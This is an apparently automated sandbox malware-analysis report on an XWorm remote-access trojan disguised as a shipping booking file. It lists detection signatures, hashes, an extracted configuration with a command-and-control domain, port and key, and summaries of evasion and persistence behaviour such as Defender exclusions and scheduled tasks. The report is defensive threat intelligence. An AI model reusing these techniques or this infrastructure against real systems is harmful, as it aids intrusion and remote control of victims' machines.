Windows Analysis Report
FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe

Overview

General Information

Sample name:	FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe
Analysis ID:	1466424
MD5:	18907f90316aa47034081363dc00f908
SHA1:	49b3c6c35c08c824ffb67f3dbcc1b215842a7014
SHA256:	d384ba14fe02622e460cd9805eb86a45b6c4f9e787ecdc015bc6034e69410e3d
Tags:	exe
Infos:

Detection

XWorm

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Scheduled temp file as task from temp location

Snort IDS alert for network traffic

Yara detected AntiVM3

Yara detected XWorm

.NET source code contains method to dynamically call methods (often used by packers)

.NET source code contains potential unpacker

.NET source code contains very large array initializations

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Bypasses PowerShell execution policy

C2 URLs / IPs found in malware configuration

Injects a PE file into a foreign processes

Loading BitLocker PowerShell Module

Machine Learning detection for dropped file

Machine Learning detection for sample

Protects its processes via BreakOnTermination flag

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Sample uses string decryption to hide its real strings

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Uses dynamic DNS services

Uses schtasks.exe or at.exe to add and modify task schedules

Yara detected Generic Downloader

AV process strings found (often used to terminate AV products)

Abnormal high CPU Usage

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Creates processes with suspicious names

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Change PowerShell Policies to an Insecure Level

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Powershell Defender Exclusion

Sigma detected: Startup Folder File Write

Sigma detected: Suspicious Add Scheduled Task Parent

Sigma detected: Suspicious Schtasks From Env Var Folder

Stores files to the Windows start menu directory

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Malware Threat Intel
Provided by

Name	Description	Attribution	Blogpost URLs	Link
XWorm	Malware with wide range of capabilities ranging from RAT to ransomware.	No Attribution	https://any.run/cybersecurity-blog/xworm-malware-communication-analysis/ https://any.run/cybersecurity-blog/xworm-technical-analysis-of-a-new-malware-version/ https://blog.cyble.com/2022/08/19/evilcoder-project-selling-multiple-dangerous-tools-online/ https://cert.pl/en/posts/2023/10/deworming-the-xworm/ https://embee-research.ghost.io/infrastructure-analysis-with-dns-pivoting/	https://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Signatures

AV Detection

Found malware configuration

Source: 0000001C.00000002.2211516335.00000000030BE000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: Xworm {"C2 url": ["futurist2.ddns.net"], "Port": "20506", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\XClient.exe	ReversingLabs: Detection: 57%
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	ReversingLabs: Detection: 57%

Multi AV Scanner detection for submitted file

Source: FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe

ReversingLabs: Detection: 57%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\XClient.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 11.2.BhTdjGetAH.exe.288d464.1.raw.unpack	String decryptor: futurist2.ddns.net
Source: 11.2.BhTdjGetAH.exe.288d464.1.raw.unpack	String decryptor: 20506
Source: 11.2.BhTdjGetAH.exe.288d464.1.raw.unpack	String decryptor: <123456789>
Source: 11.2.BhTdjGetAH.exe.288d464.1.raw.unpack	String decryptor: <Xwormmm>
Source: 11.2.BhTdjGetAH.exe.288d464.1.raw.unpack	String decryptor: GRACEOFGOD
Source: 11.2.BhTdjGetAH.exe.288d464.1.raw.unpack	String decryptor: USB.exe
Source: 11.2.BhTdjGetAH.exe.288d464.1.raw.unpack	String decryptor: %LocalAppData%
Source: 11.2.BhTdjGetAH.exe.288d464.1.raw.unpack	String decryptor: XClient.exe

Uses 32bit PE files

Source: FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Found inlined nop instructions (likely shell or obfuscated code)

Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Code function: 4x nop then jmp 0506B5DCh	1_2_0506AC43
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Code function: 4x nop then jmp 0C4DA87Ch	11_2_0C4D9EE3
Source: C:\Users\user\AppData\Local\XClient.exe	Code function: 4x nop then jmp 050FA87Ch	28_2_050F9EE3
Source: C:\Users\user\AppData\Local\XClient.exe	Code function: 4x nop then jmp 04A7A87Ch	32_2_04A79EE3

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2855924 ETPRO TROJAN Win32/XWorm V3 CnC Command - PING Outbound 192.168.2.4:49743 -> 102.90.42.110:20506
Source: Traffic	Snort IDS: 2853193 ETPRO TROJAN Win32/XWorm V3 CnC Command - PING Outbound 192.168.2.4:49747 -> 102.90.42.110:20506

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: futurist2.ddns.net

Uses dynamic DNS services

Source: unknown

DNS query: name: futurist2.ddns.net

Yara detected Generic Downloader

Source: Yara match

File source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.30162b0.0.raw.unpack, type: UNPACKEDPE

Detected TCP or UDP traffic on non-standard ports

Source: global traffic

TCP traffic: 192.168.2.4:49741 -> 102.90.42.110:20506

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: VCG-ASNG VCG-ASNG

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

DNS traffic detected: DNS query: futurist2.ddns.net

Source: powershell.exe, 00000019.00000002.2022501378.0000000007115000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2023383216.0000000007198000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.micro$
Source: powershell.exe, 0000000D.00000002.1832933847.0000000007E2A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microso
Source: powershell.exe, 0000000D.00000002.1810611459.000000000537C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1883850643.00000000051CC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1958129515.000000000572B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2013329226.000000000558A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000019.00000002.1989730122.0000000004676000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 0000000D.00000002.1804203407.0000000004466000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1868794212.00000000042B6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1927085686.0000000004817000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.1989730122.0000000004676000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe, 00000001.00000002.1767946178.0000000002FE1000.00000004.00000800.00020000.00000000.sdmp, FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe, 0000000A.00000002.4195467542.0000000002D61000.00000004.00000800.00020000.00000000.sdmp, BhTdjGetAH.exe, 0000000B.00000002.1839980652.0000000002801000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1804203407.0000000004311000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1868794212.0000000004161000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1927085686.00000000046C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.1989730122.0000000004521000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 0000001C.00000002.2211516335.0000000003071000.00000004.00000800.00020000.00000000.sdmp, XClient.exe, 00000020.00000002.2282271067.0000000002A29000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 0000000D.00000002.1804203407.0000000004466000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1868794212.00000000042B6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1927085686.0000000004817000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.1989730122.0000000004676000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe, 00000001.00000002.1775930634.0000000007212000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000019.00000002.1989730122.0000000004676000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe, 00000001.00000002.1775930634.0000000007212000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe, 00000001.00000002.1775930634.0000000007212000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe, 00000001.00000002.1775930634.0000000007212000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe, 00000001.00000002.1775930634.0000000007212000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe, 00000001.00000002.1775930634.0000000007212000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe, 00000001.00000002.1775930634.0000000007212000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe, 00000001.00000002.1775930634.0000000007212000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe, 00000001.00000002.1775930634.0000000007212000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe, 00000001.00000002.1775930634.0000000007212000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe, 00000001.00000002.1775930634.0000000007212000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fonts.com
Source: FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe, 00000001.00000002.1775930634.0000000007212000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe, 00000001.00000002.1775930634.0000000007212000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe, 00000001.00000002.1775930634.0000000007212000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe, 00000001.00000002.1775930634.0000000007212000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe, 00000001.00000002.1775930634.0000000007212000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe, 00000001.00000002.1775930634.0000000007212000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe, 00000001.00000002.1775930634.0000000007212000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: powershell.exe, 00000015.00000002.1970141232.0000000008112000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.coXd
Source: FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe, 00000001.00000002.1775930634.0000000007212000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe, 00000001.00000002.1775930634.0000000007212000.00000004.00000800.00020000.00000000.sdmp, FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe, 00000001.00000002.1775432995.0000000005A60000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.sakkal.com
Source: FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe, 00000001.00000002.1775930634.0000000007212000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe, 00000001.00000002.1775930634.0000000007212000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.tiro.com
Source: FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe, 00000001.00000002.1775930634.0000000007212000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.typography.netD
Source: FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe, 00000001.00000002.1775930634.0000000007212000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe, 00000001.00000002.1775930634.0000000007212000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: powershell.exe, 0000000D.00000002.1804203407.0000000004311000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1868794212.0000000004161000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1927085686.00000000046C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.1989730122.0000000004521000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 00000019.00000002.2013329226.000000000558A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000019.00000002.2013329226.000000000558A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000019.00000002.2013329226.000000000558A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000019.00000002.1989730122.0000000004676000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 0000000D.00000002.1802652172.0000000000448000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://go.mic
Source: powershell.exe, 00000013.00000002.1868794212.000000000494E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1868794212.0000000004ABD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.1989730122.0000000004C56000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.1989730122.0000000004E80000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: powershell.exe, 0000000D.00000002.1810611459.000000000537C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1883850643.00000000051CC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1958129515.000000000572B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2013329226.000000000558A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe

Operating System Destruction

Protects its processes via BreakOnTermination flag

Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe

Process information set: 01 00 00 00

Jump to behavior

System Summary

Malicious sample detected (through community Yara rule)

Source: 11.2.BhTdjGetAH.exe.288d464.1.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 11.2.BhTdjGetAH.exe.2878b80.0.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.3092a90.2.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.307e1ac.1.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 17.2.BhTdjGetAH.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.3092a90.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 28.2.XClient.exe.31210c4.0.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.307e1ac.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 11.2.BhTdjGetAH.exe.288d464.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 28.2.XClient.exe.310c7e0.2.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 11.2.BhTdjGetAH.exe.2878b80.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 28.2.XClient.exe.31210c4.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 28.2.XClient.exe.310c7e0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.30162b0.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000011.00000002.1844167553.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0000001C.00000002.2211516335.00000000030BE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000001.00000002.1767946178.0000000002FE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0000000B.00000002.1839980652.0000000002801000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen

.NET source code contains very large array initializations

Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.5810000.6.raw.unpack, -Module-.cs

Large array initialization: _200D_200D_202B_206F_206A_206B_202B_200B_200D_206D_200C_206B_206A_200B_202E_200C_200E_202A_200E_206D_206F_202D_206F_206D_206C_200F_206A_202D_206C_202B_206A_206F_202A_206A_200E_200F_200B_200F_202E_202D_202E: array initializer size 3088

Abnormal high CPU Usage

Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe

Process Stats: CPU usage > 49%

Detected potential crypto function

Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Code function: 1_2_0146D4FC	1_2_0146D4FC
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Code function: 1_2_02FC70F0	1_2_02FC70F0
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Code function: 1_2_02FC0040	1_2_02FC0040
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Code function: 1_2_02FC001C	1_2_02FC001C
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Code function: 1_2_05064F37	1_2_05064F37
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Code function: 1_2_05064F48	1_2_05064F48
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Code function: 1_2_050646D8	1_2_050646D8
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Code function: 1_2_050661D8	1_2_050661D8
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Code function: 1_2_050661E8	1_2_050661E8
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Code function: 1_2_0506C878	1_2_0506C878
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Code function: 1_2_05064B10	1_2_05064B10
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Code function: 1_2_05066AB0	1_2_05066AB0
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Code function: 1_2_05066AC0	1_2_05066AC0
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Code function: 1_2_0565BD00	1_2_0565BD00
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Code function: 1_2_0565C738	1_2_0565C738
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Code function: 1_2_05650040	1_2_05650040
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Code function: 1_2_0565935C	1_2_0565935C
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Code function: 10_2_012649C8	10_2_012649C8
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Code function: 10_2_01264FC0	10_2_01264FC0
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Code function: 10_2_01261958	10_2_01261958
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Code function: 10_2_01261FE8	10_2_01261FE8
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Code function: 10_2_05CE0548	10_2_05CE0548
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Code function: 10_2_05CE5550	10_2_05CE5550
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Code function: 10_2_05CE6F73	10_2_05CE6F73
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Code function: 10_2_05CE4F28	10_2_05CE4F28
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Code function: 11_2_00D8D4FC	11_2_00D8D4FC
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Code function: 11_2_0C4D4E07	11_2_0C4D4E07
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Code function: 11_2_0C4D4E18	11_2_0C4D4E18
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Code function: 11_2_0C4D697F	11_2_0C4D697F
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Code function: 11_2_0C4D49E0	11_2_0C4D49E0
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Code function: 11_2_0C4D6990	11_2_0C4D6990
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Code function: 11_2_0C4DBA58	11_2_0C4DBA58
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Code function: 11_2_0C4D45A8	11_2_0C4D45A8
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Code function: 11_2_0C4D60A7	11_2_0C4D60A7
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Code function: 11_2_0C4D60B8	11_2_0C4D60B8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_042DB490	13_2_042DB490
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_08333EA8	13_2_08333EA8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_083357AF	13_2_083357AF
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_08335780	13_2_08335780
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Code function: 17_2_01051958	17_2_01051958
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Code function: 17_2_01051FE8	17_2_01051FE8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 19_2_0414B4A0	19_2_0414B4A0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 19_2_0414B490	19_2_0414B490
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 21_2_045FB490	21_2_045FB490
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 25_2_068EB4A0	25_2_068EB4A0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 25_2_068EB490	25_2_068EB490
Source: C:\Users\user\AppData\Local\XClient.exe	Code function: 28_2_02E7D4FC	28_2_02E7D4FC
Source: C:\Users\user\AppData\Local\XClient.exe	Code function: 28_2_050F46D8	28_2_050F46D8
Source: C:\Users\user\AppData\Local\XClient.exe	Code function: 28_2_050F61D8	28_2_050F61D8
Source: C:\Users\user\AppData\Local\XClient.exe	Code function: 28_2_050F61E8	28_2_050F61E8
Source: C:\Users\user\AppData\Local\XClient.exe	Code function: 28_2_050F4F37	28_2_050F4F37
